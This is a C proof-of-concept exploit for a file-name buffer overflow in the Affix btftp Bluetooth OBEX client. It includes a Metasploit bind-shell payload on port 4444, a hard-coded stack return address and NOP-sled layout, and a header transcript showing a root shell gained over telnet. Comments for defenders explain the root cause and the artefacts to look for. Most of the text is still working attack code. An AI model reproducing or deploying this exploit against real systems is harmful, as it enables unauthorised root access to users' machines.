/*

Remote Nokia Affix btftp client exploit
by kf_lists[at]secnetops[dot]com

threat:~# btftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp>  open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8Á¾ýÞ)á½Tnb    6               uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V
            Ï­¹¿)ýÞ
ýÞÑýÞÐÉî¼Xq¶X6¶Y0

----------------------

root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found



*/

#include <stdio.h>
#include <strings.h>
/*
 * Proof-of-concept generator for the btftp client overflow named in the file
 * header. It performs no Bluetooth I/O: it creates one file, relative to the
 * current working directory, whose *name* is the malicious input, and writes
 * the marker text "pwned\n" into it.
 *
 * Per the header transcript, the file sits in an Affix OBEX inbox and the
 * overflow is hit when a btftp client (Affix 2.1.1 in the transcript) runs
 * "ls" against that peer; the bind shell then appears on the client host.
 *
 * Reviewer notes for defenders:
 *  - Root cause is on the client side: a file name supplied by a remote OBEX
 *    peer is untrusted data and must be length-checked before it is copied
 *    or formatted. The vulnerable code itself is not part of this file.
 *  - Artefacts visible here: a very long, mostly non-printable file name
 *    starting with a run of 0x90 bytes, and (per the payload comment below)
 *    a listener on TCP port 4444 on the machine that ran the client.
 *  - The transcript shows the resulting shell running as uid 0, i.e. the
 *    client was run as root; running it unprivileged limits the impact.
 */
main()
{
	FILE *malfile;

	/* linux_ia32_bind - LPORT=4444 Size=108 Encoder=Pex http://metasploit.com */ 
	/* Encoded payload bytes; treated as an opaque blob by the code below. */
	unsigned char scode[] = 
	"\x33\xc9\x83\xe9\xeb\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x99" 
	"\xee\x30\x5e\x83\xee\xfc\xe2\xf4\xa8\x35\x63\x1d\xca\x84\x32\x34" 
	"\xff\xb6\xa9\xd7\x78\x23\xb0\xc8\xda\xbc\x56\x36\x88\xb2\x56\x0d" 
	"\x10\x0f\x5a\x38\xc1\xbe\x61\x08\x10\x0f\xfd\xde\x29\x88\xe1\xbd" 
	"\x54\x6e\x62\x0c\xcf\xad\xb9\xbf\x29\x88\xfd\xde\x0a\x84\x32\x07" 
	"\x29\xd1\xfd\xde\xd0\x97\xc9\xee\x92\xbc\x58\x71\xb6\x9d\x58\x36" 
	"\xb6\x8c\x59\x30\x10\x0d\x62\x0d\x10\x0f\xfd\xde"; 

	/*
	 * buf becomes the file name. Layout built below:
	 *   [0..93]    0x90 filler
	 *   [94..97]   4-byte value 75 fb ff bf
	 *   [98..101]  the same 4-byte value again
	 *   [102..141] 0x90 filler
	 *   [142..]    scode
	 * That is 142 bytes ahead of the payload; with the 108-byte payload the
	 * name is 250 bytes, provided scode holds no NUL byte (strcat stops at
	 * the first one).
	 * NOTE(review): 75 fb ff bf read little-endian is 0xbffffb75, presumably
	 * a hard-coded ia32 stack address meant to replace a saved return
	 * pointer. It is specific to the author's target and not derivable from
	 * this file -- confirm before relying on that reading.
	 */
	char buf[1024];
	/* Zero the whole buffer first so every strcat() below finds a '\0' at
	 * the exact offset it is given and the result stays NUL-terminated. */
	memset(buf,'\0',sizeof(buf));
	memset(buf,'\x90',94);
	strcat(buf+94,"\x75\xfb\xff\xbf");
	strcat(buf+98,"\x75\xfb\xff\xbf");
	memset(buf+102,'\x90',40);
	strcat(buf+142,scode);

	/* Create the file under the crafted name; "w+" truncates or creates. */
        if(!(malfile = fopen(buf,"w+"))) {
                printf("error opening file\n");
                exit(1);
        }
        
	/* The content is only a marker; the file name carries the input. */
	fprintf(malfile, "pwned\n" );
        fclose(malfile);

}


